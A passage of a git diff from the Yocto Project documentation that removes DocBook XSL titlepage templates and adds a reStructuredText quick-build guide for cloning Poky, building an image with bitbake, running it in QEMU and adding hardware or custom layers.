- <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="bibliography.titlepage.before.recto"/>
- <xsl:call-template name="bibliography.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="bibliography.titlepage.before.verso"/>
- <xsl:call-template name="bibliography.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="bibliography.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="bibliography.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="bibliography.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="bibliography.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="bibliography.titlepage.recto.style">
-<xsl:apply-templates select="." mode="bibliography.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.recto">
- <div xsl:use-attribute-sets="glossary.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::glossary[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="glossaryinfo/subtitle">
- <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="glossaryinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="glossary.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="glossary.titlepage.before.recto"/>
- <xsl:call-template name="glossary.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="glossary.titlepage.before.verso"/>
- <xsl:call-template name="glossary.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="glossary.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="glossary.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="glossary.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="glossary.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="glossary.titlepage.recto.style">
-<xsl:apply-templates select="." mode="glossary.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="index.titlepage.recto">
- <div xsl:use-attribute-sets="index.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::index[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="indexinfo/subtitle">
- <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="indexinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="index.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="index.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="index.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="index.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="index.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="index.titlepage.before.recto"/>
- <xsl:call-template name="index.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="index.titlepage.before.verso"/>
- <xsl:call-template name="index.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="index.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="index.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="index.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="index.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="index.titlepage.recto.style">
-<xsl:apply-templates select="." mode="index.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.recto">
- <div xsl:use-attribute-sets="setindex.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::setindex[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="setindexinfo/subtitle">
- <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="setindexinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="setindex.titlepage.before.recto"/>
- <xsl:call-template name="setindex.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="setindex.titlepage.before.verso"/>
- <xsl:call-template name="setindex.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="setindex.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="setindex.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="setindex.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="setindex.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="setindex.titlepage.recto.style">
-<xsl:apply-templates select="." mode="setindex.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sidebarinfo/title">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="sidebarinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sidebarinfo/subtitle">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="sidebarinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sidebar.titlepage.before.recto"/>
- <xsl:call-template name="sidebar.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sidebar.titlepage.before.verso"/>
- <xsl:call-template name="sidebar.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sidebar.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sidebar.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sidebar.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sidebar.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sidebar.titlepage.recto.style">
-<xsl:call-template name="formal.object.heading">
-<xsl:with-param name="object" select="ancestor-or-self::sidebar[1]"/>
-</xsl:call-template>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sidebar.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sidebar.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sidebar.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-</xsl:stylesheet>
-
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
new file mode 100644
index 0000000000..6a44511af2
--- /dev/null
+++ b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
@@ -0,0 +1,421 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=========================
+Yocto Project Quick Build
+=========================
+
+Welcome!
+========
+
+This short document steps you through the process for a typical
+image build using the Yocto Project. The document also introduces how to
+configure a build for specific hardware. You will use Yocto Project to
+build a reference embedded OS called Poky.
+
+.. note::
+
+ - The examples in this paper assume you are using a native Linux
+ system running a recent Ubuntu Linux distribution. If the machine
+ you want to use Yocto Project on to build an image
+ (:term:`Build Host`) is not
+ a native Linux system, you can still perform these steps by using
+ CROss PlatformS (CROPS) and setting up a Poky container. See the
+ :ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`
+ section
+ in the Yocto Project Development Tasks Manual for more
+ information.
+
+ - You may use Windows Subsystem For Linux v2 to set up a build host
+ using Windows 10.
+
+ .. note::
+
+ The Yocto Project is not compatible with WSLv1, it is
+ compatible but not officially supported nor validated with
+ WSLv2, if you still decide to use WSL please upgrade to WSLv2.
+
+ See the :ref:`dev-manual/dev-manual-start:setting up to use windows
+ subsystem for linux (wslv2)` section in the Yocto Project Development
+ Tasks Manual for more information.
+
+If you want more conceptual or background information on the Yocto
+Project, see the :doc:`../overview-manual/overview-manual`.
+
+Compatible Linux Distribution
+=============================
+
+Make sure your :term:`Build Host` meets the
+following requirements:
+
+- 50 Gbytes of free disk space
+
+- Runs a supported Linux distribution (i.e. recent releases of Fedora,
+ openSUSE, CentOS, Debian, or Ubuntu). For a list of Linux
+ distributions that support the Yocto Project, see the
+ :ref:`ref-manual/ref-system-requirements:supported linux distributions`
+ section in the Yocto Project Reference Manual. For detailed
+ information on preparing your build host, see the
+ :ref:`dev-manual/dev-manual-start:preparing the build host`
+ section in the Yocto Project Development Tasks Manual.
+
+-
+
+ - Git 1.8.3.1 or greater
+ - tar 1.28 or greater
+ - Python 3.5.0 or greater.
+ - gcc 5.0 or greater.
+
+If your build host does not meet any of these three listed version
+requirements, you can take steps to prepare the system so that you
+can still use the Yocto Project. See the
+:ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`
+section in the Yocto Project Reference Manual for information.
+
+Build Host Packages
+===================
+
+You must install essential host packages on your build host. The
+following command installs the host packages based on an Ubuntu
+distribution:
+
+.. code-block:: shell
+
+ $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
+
+.. note::
+
+ For host package requirements on all supported Linux distributions,
+ see the :ref:`ref-manual/ref-system-requirements:required packages for the build host`
+ section in the Yocto Project Reference Manual.
+
+Use Git to Clone Poky
+=====================
+
+Once you complete the setup instructions for your machine, you need to
+get a copy of the Poky repository on your build host. Use the following
+commands to clone the Poky repository.
+
+.. code-block:: shell
+
+ $ git clone git://git.yoctoproject.org/poky
+ Cloning into 'poky'...
+ remote: Counting
+ objects: 432160, done. remote: Compressing objects: 100%
+ (102056/102056), done. remote: Total 432160 (delta 323116), reused
+ 432037 (delta 323000) Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
+ Resolving deltas: 100% (323116/323116), done.
+ Checking connectivity... done.
+
+Move to the ``poky`` directory and take a look at the tags:
+
+.. code-block:: shell
+
+ $ cd poky
+ $ git fetch --tags
+ $ git tag
+ 1.1_M1.final
+ 1.1_M1.rc1
+ 1.1_M1.rc2
+ 1.1_M2.final
+ 1.1_M2.rc1
+ .
+ .
+ .
+ yocto-2.5
+ yocto-2.5.1
+ yocto-2.5.2
+ yocto-2.6
+ yocto-2.6.1
+ yocto-2.6.2
+ yocto-2.7
+ yocto_1.5_M5.rc8
+
+For this example, check out the branch based on the
+``&DISTRO_REL_TAG;`` release:
+
+.. code-block:: shell
+
+ $ git checkout tags/&DISTRO_REL_TAG; -b my-&DISTRO_REL_TAG;
+ Switched to a new branch 'my-&DISTRO_REL_TAG;'
+
+The previous Git checkout command creates a local branch named
+``my-&DISTRO_REL_TAG;``. The files available to you in that branch exactly
+match the repository's files in the ``&DISTRO_NAME_NO_CAP;`` development
+branch at the time of the Yocto Project &DISTRO_REL_TAG; release.
+
+For more options and information about accessing Yocto Project related
+repositories, see the
+:ref:`dev-manual/dev-manual-start:locating yocto project source files`
+section in the Yocto Project Development Tasks Manual.
+
+Building Your Image
+===================
+
+Use the following steps to build your image. The build process creates
+an entire Linux distribution, including the toolchain, from source.
+
+.. note::
+
+ - If you are working behind a firewall and your build host is not
+ set up for proxies, you could encounter problems with the build
+ process when fetching source code (e.g. fetcher failures or Git
+ failures).
+
+ - If you do not know your proxy settings, consult your local network
+ infrastructure resources and get that information. A good starting
+ point could also be to check your web browser settings. Finally,
+ you can find more information on the
+ ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+ page of the Yocto Project Wiki.
+
+#. **Initialize the Build Environment:** From within the ``poky``
+ directory, run the :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``
+ environment
+ setup script to define Yocto Project's build environment on your
+ build host.
+
+ .. code-block:: shell
+
+ $ cd ~/poky
+ $ source oe-init-build-env
+ You had no conf/local.conf file. This configuration file has therefore been
+ created for you with some default values. You may wish to edit it to, for
+ example, select a different MACHINE (target hardware). See conf/local.conf
+ for more information as common configuration options are commented.
+
+ You had no conf/bblayers.conf file. This configuration file has therefore
+ been created for you with some default values. To add additional metadata
+ layers into your configuration please add entries to conf/bblayers.conf.
+
+ The Yocto Project has extensive documentation about OE including a reference
+ manual which can be found at:
+ http://yoctoproject.org/documentation
+
+ For more information about OpenEmbedded see their website:
+ http://www.openembedded.org/
+
+ ### Shell environment set up for builds. ###
+
+ You can now run 'bitbake <target>'
+
+ Common targets are:
+ core-image-minimal
+ core-image-sato
+ meta-toolchain
+ meta-ide-support
+
+ You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+ Among other things, the script creates the :term:`Build Directory`, which is
+ ``build`` in this case and is located in the :term:`Source Directory`. After
+ the script runs, your current working directory is set to the Build
+ Directory. Later, when the build completes, the Build Directory contains all the
+ files created during the build.
+
+#. **Examine Your Local Configuration File:** When you set up the build
+ environment, a local configuration file named ``local.conf`` becomes
+ available in a ``conf`` subdirectory of the Build Directory. For this
+ example, the defaults are set to build for a ``qemux86`` target,
+ which is suitable for emulation. The package manager used is set to
+ the RPM package manager.
+
+ .. tip::
+
+ You can significantly speed up your build and guard against fetcher
+ failures by using mirrors. To use mirrors, add this line to your
+ ``local.conf`` file in the :term:`Build Directory`: ::
+
+ SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
+
+#. **Start the Build:** Continue with the following command to build an OS
+ image for the target, which is ``core-image-sato`` in this example:
+
+ .. code-block:: shell
+
+ $ bitbake core-image-sato
+
+ For information on using the ``bitbake`` command, see the
+ :ref:`usingpoky-components-bitbake` section in the Yocto Project Overview and
+ Concepts Manual, or see the ":ref:`BitBake Command
+ <bitbake:bitbake-user-manual-command>`" section in the BitBake User Manual.
+
+#. **Simulate Your Image Using QEMU:** Once this particular image is
+ built, you can start QEMU, which is a Quick EMUlator that ships with
+ the Yocto Project:
+
+ .. code-block:: shell
+
+ $ runqemu qemux86-64
+
+ If you want to learn more about running QEMU, see the
+ :ref:`dev-manual/dev-manual-qemu:using the quick emulator (qemu)` chapter in
+ the Yocto Project Development Tasks Manual.
+
+#. **Exit QEMU:** Exit QEMU by either clicking on the shutdown icon or by typing
+ ``Ctrl-C`` in the QEMU transcript window from which you evoked QEMU.
+
+Customizing Your Build for Specific Hardware
+============================================
+
+So far, all you have done is quickly built an image suitable for
+emulation only. This section shows you how to customize your build for
+specific hardware by adding a hardware layer into the Yocto Project
+development environment.
+
+In general, layers are repositories that contain related sets of
+instructions and configurations that tell the Yocto Project what to do.
+Isolating related metadata into functionally specific layers facilitates
+modular development and makes it easier to reuse the layer metadata.
+
+.. note::
+
+ By convention, layer names start with the string "meta-".
+
+Follow these steps to add a hardware layer:
+
+#. **Find a Layer:** Lots of hardware layers exist. The Yocto Project
+ :yocto_git:`Source Repositories <>` has many hardware layers.
+ This example adds the
+ `meta-altera <https://github.com/kraj/meta-altera>`__ hardware layer.
+
+#. **Clone the Layer:** Use Git to make a local copy of the layer on your
+ machine. You can put the copy in the top level of the copy of the
+ Poky repository created earlier:
+
+ .. code-block:: shell
+
+ $ cd ~/poky
+ $ git clone https://github.com/kraj/meta-altera.git
+ Cloning into 'meta-altera'...
+ remote: Counting objects: 25170, done.
+ remote: Compressing objects: 100% (350/350), done.
+ remote: Total 25170 (delta 645), reused 719 (delta 538), pack-reused 24219
+ Receiving objects: 100% (25170/25170), 41.02 MiB | 1.64 MiB/s, done.
+ Resolving deltas: 100% (13385/13385), done.
+ Checking connectivity... done.
+
+ The hardware layer now exists
+ with other layers inside the Poky reference repository on your build
+ host as ``meta-altera`` and contains all the metadata needed to
+ support hardware from Altera, which is owned by Intel.
+
+ .. note::
+
+ It is recommended for layers to have a branch per Yocto Project release.
+ Please make sure to checkout the layer branch supporting the Yocto Project
+ release you're using.
+
+#. **Change the Configuration to Build for a Specific Machine:** The
+ :term:`MACHINE` variable in the
+ ``local.conf`` file specifies the machine for the build. For this
+ example, set the ``MACHINE`` variable to ``cyclone5``. These
+ configurations are used:
+ https://github.com/kraj/meta-altera/blob/master/conf/machine/cyclone5.conf.
+
+ .. note::
+
+ See the "Examine Your Local Configuration File" step earlier for more
+ information on configuring the build.
+
+#. **Add Your Layer to the Layer Configuration File:** Before you can use
+ a layer during a build, you must add it to your ``bblayers.conf``
+ file, which is found in the
+ :term:`Build Directory` ``conf``
+ directory.
+
+ Use the ``bitbake-layers add-layer`` command to add the layer to the
+ configuration file:
+
+ .. code-block:: shell
+
+ $ cd ~/poky/build
+ $ bitbake-layers add-layer ../meta-altera
+ NOTE: Starting bitbake server...
+ Parsing recipes: 100% |##################################################################| Time: 0:00:32
+ Parsing of 918 .bb files complete (0 cached, 918 parsed). 1401 targets,
+ 123 skipped, 0 masked, 0 errors.
+
+ You can find
+ more information on adding layers in the
+ :ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`
+ section.
+
+Completing these steps has added the ``meta-altera`` layer to your Yocto
+Project development environment and configured it to build for the
+``cyclone5`` machine.
+
+.. note::
+
+ The previous steps are for demonstration purposes only. If you were
+ to attempt to build an image for the ``cyclone5`` machine, you should
+ read the Altera ``README``.
+
+Creating Your Own General Layer
+===============================
+
+Maybe you have an application or specific set of behaviors you need to
+isolate. You can create your own general layer using the
+``bitbake-layers create-layer`` command. The tool automates layer
+creation by setting up a subdirectory with a ``layer.conf``
+configuration file, a ``recipes-example`` subdirectory that contains an
+``example.bb`` recipe, a licensing file, and a ``README``.
+
+The following commands run the tool to create a layer named
+``meta-mylayer`` in the ``poky`` directory:
+
+.. code-block:: shell
+
+ $ cd ~/poky
+ $ bitbake-layers create-layer meta-mylayer
+ NOTE: Starting bitbake server...
+ Add your new layer with 'bitbake-layers add-layer meta-mylayer'
+
+For more information
+on layers and how to create them, see the
+:ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`
+section in the Yocto Project Development Tasks Manual.
+
+Where To Go Next
+================
+
+Now that you have experienced using the Yocto Project, you might be
+asking yourself "What now?". The Yocto Project has many sources of
+information including the website, wiki pages, and user manuals:
+
+- **Website:** The :yocto_home:`Yocto Project Website <>` provides
+ background information, the latest builds, breaking news, full
+ development documentation, and access to a rich Yocto Project
+ Development Community into which you can tap.
+
+- **Developer Screencast:** The `Getting Started with the Yocto Project -
+ New Developer Screencast Tutorial <http://vimeo.com/36450321>`__
+ provides a 30-minute video created for users unfamiliar with the
+ Yocto Project but familiar with Linux build hosts. While this
+ screencast is somewhat dated, the introductory and fundamental
+ concepts are useful for the beginner.
+
+- **Yocto Project Overview and Concepts Manual:** The
+ :doc:`../overview-manual/overview-manual` is a great
+ place to start to learn about the Yocto Project. This manual
+ introduces you to the Yocto Project and its development environment.
+ The manual also provides conceptual information for various aspects
+ of the Yocto Project.
+
+- **Yocto Project Wiki:** The :yocto_wiki:`Yocto Project Wiki <>`
+ provides additional information on where to go next when ramping up
